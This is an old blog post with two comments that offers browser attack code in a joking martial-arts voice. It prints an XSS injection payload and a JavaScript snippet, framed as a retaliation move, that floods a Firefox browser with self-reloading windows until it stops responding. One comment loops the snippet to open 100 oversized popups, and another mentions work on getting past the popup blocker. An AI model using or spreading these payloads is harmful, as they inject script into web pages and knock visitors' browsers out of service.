WebFu crouching tab hidden dos
Friday, 23 November 2007
Hello my student here I’ll show you the way of the tiger, if a deadly Firefox ninja approaches your dojo with a XSS punch:-
"><script>alert(/XSS PUNCH!/)</script>
Then you can respond with the crouching tab hidden dos move:-
self.location = "javascript:window.open('javascript:document.clear();
document.open();document.close();self.location=self.location')";
This move can frustrate your opponent into submission.
No. 1 — November 23rd, 2007 at 11:41 am
for(i=0;i<100;i++) {
self.location = “javascript:window.open(‘javascript:document.clear();document.open();document.close();self.location=self.location;’,”,’width=2000,height=2000′)”;
}
No. 2 — November 23rd, 2007 at 12:53 pm
Please note this technique requires the popup blocker to be disabled, I’m currently working on a technique to bypass that.